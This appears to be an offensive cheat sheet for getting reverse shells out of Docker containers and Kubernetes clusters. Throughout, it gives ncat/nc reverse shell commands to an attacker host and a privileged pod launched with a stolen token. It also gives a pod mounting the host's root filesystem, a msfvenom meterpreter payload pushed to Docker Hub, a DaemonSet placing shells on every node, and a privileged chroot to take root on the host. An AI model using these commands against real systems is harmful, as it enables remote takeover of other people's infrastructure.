Get Reverse Shell (Docker/K8s)
Docker run¶
Attacker:
ncat -l -p 8989
Target System:
docker run raesene/ncat <attacker_IP> 8989 -e /bin/sh
Dockerfile¶
Attacker:
ncat -l -p 8989
Target System:
FROM ubuntu:18.04
RUN apt update && apt install -y ncat
RUN ncat <attacker_IP> 8989 -e /bin/sh
CMD ["/bin/bash"]
From compromised Pod¶
Attacker:
ncat -l -p 8989
Target System:
kubectl --server=https://K8S_HOST:K8S_PORT
--insecure-skip-tls-verify=true
--token="<TOKEN>"
run --rm -it busybox --image=busybox --restart=Never
--overrides='{"apiVersion": "v1",
"spec":{"containers":[{"name":"busybox","image":"busybox",
"stdin":true, "tty":true, "command":["/bin/nc",
"192.168.42.1", "8989", "-e", "/bin/ash", "-i"],
"securityContext":{"privileged":true}}]}}'
K8s cluster¶
Attacker:
ncat -l -p 8989
Target System:
apiVersion: v1
kind: Pod
metadata:
name: ncat-reverse-shell-pod
labels:
app: ncat
spec:
containers:
- name: ncat-reverse-shell
image: raesene/ncat
volumeMounts:
- mountPath: /host
name: hostvolume
args: ['<attacker_IP>', '8989', '-e', '/bin/bash']
volumes:
- name: hostvolume
hostPath:
path: /
type: Directory
Reverse shell on every node¶
Attacker:
# Create payload
$ docker run raesene/metasploit ./msfvenom -p linux/x64/meterpreter_reverse_http LHOST=<attacker_IP> LPORT=8989 -f elf > reverse_shell.elf
# Setup docker image
$ curl https://download.docker.com/linux/ubuntu/gpg > docker.gpg
# Build and push to docker hub
$ docker build -t raesene/reverse_shell .
$ docker push raesene/reverse_shell
# Setup metasploit
$ msfconsole
> use exploit/multi/handler
> set payload linux/x64/meterpreter_reverse_http
> set LHOST <attacker_IP>
> set LPORT 8989
> set ExitOnSession false
> exploit -j
$ cat Dockerfile
FROM ubuntu:18.04
RUN apt update && apt install -y apt-transport-https ca-certificates curl software-properties-common
COPY docker.gpg /docker.gpg
RUN apt-key add /docker.gpg
RUN add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
RUN apt-get install -y docker-ce-cli
COPY reverse_shell.elf /reverse_shell.elf
RUN chmod +x /reverse_shell.elf
CMD ["/reverse_shell.elf"]
Target System:
# Get single shell
$ docker run raesene/reverse_shell
# Get shell inside container on each node
$ kubectl create -f reverse-shell-daemonset.yml
$ cat reverse-shell-daemonset.yml
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: reverse-shell-daemonset
labels:
spec:
selector:
matchLabels:
name: reverse-shell-daemonset
template:
metadata:
labels:
name: reverse-shell-daemonset
spec:
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: revshell
image: raesene/reverse-shell
volumeMounts:
- mountPath: /var/run/docker.sock
name: dockersock
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
Attacker:
# Get shells
msf> sessions -l
# Get root on underlying host
msf> sessions -i 1
msf> shell
$ docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host